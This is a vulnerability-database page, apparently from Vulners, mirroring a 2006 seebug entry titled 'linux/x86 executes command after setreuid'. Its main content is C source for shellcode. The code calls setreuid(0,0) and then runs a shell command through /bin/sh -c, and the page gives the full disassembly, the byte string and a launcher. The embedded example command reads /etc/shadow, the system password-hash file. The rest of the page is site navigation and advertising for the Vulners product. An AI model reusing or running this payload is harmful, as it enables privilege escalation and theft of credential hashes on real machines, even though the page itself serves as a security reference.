Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

linux/x86 executes command after setreuid (9 + 40 bytes + cmd)

🗓️ 23 Oct 2006 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 10 Views

linux/x86 executes command after setreuid (9 + 40 bytes + cmd). Bunker exploit for setreuid and execve system call

Code

                                                /*
 * bunker_exec.c V1.3 - Tue Mar 21 22:50:18 CET 2006
 *
 * Linux/x86 bytecode that executes command after setreuid
 * (9 + 40 bytes + cmd)
 * 
 * setreuid(0, 0) + execve("/bin//sh", ["/bin//sh","-c","cmd"], NULL);
 *
 * "cmd" MUST be terminated with ";" (better with ";exit;" :-D)
 *
 * bunker - http://rawlab.mindcreations.com
 * 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
 *
 * setreuid(0, 0);
 * 00000000  6a46              push byte +0x46
 * 00000002  58                pop eax
 * 00000003  31db              xor ebx,ebx
 * 00000005  31c9              xor ecx,ecx
 * 00000007  cd80              int 0x80
 *
 * execve("/bin//sh", ["/bin//sh", "-c", "cmd"], NULL);
 * 00000009  eb21              jmp short 0x2c
 * 0000000b  5f                pop edi
 * 0000000c  6a0b              push byte +0xb
 * 0000000e  58                pop eax
 * 0000000f  99                cdq
 * 00000010  52                push edx
 * 00000011  66682d63          push word 0x632d
 * 00000015  89e6              mov esi,esp
 * 00000017  52                push edx
 * 00000018  682f2f7368        push dword 0x68732f2f
 * 0000001d  682f62696e        push dword 0x6e69622f
 * 00000022  89e3              mov ebx,esp
 * 00000024  52                push edx
 * 00000025  57                push edi
 * 00000026  56                push esi
 * 00000027  53                push ebx
 * 00000028  89e1              mov ecx,esp
 * 0000002a  cd80              int 0x80
 * 0000002c  e8daffffff        call 0xb
 * 00000031  ....              "cmd; exit;"
 */

char sc[]=
"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99" 
"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff"
"cat /etc/shadow; exit;";

main() { int(*f)()=(int(*)())sc;f(); }

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Oct 2006 00:00Current
7.1High risk
Vulners AI Score7.1
linux/x86setreuidexecvesystem callsbunker exploit .
10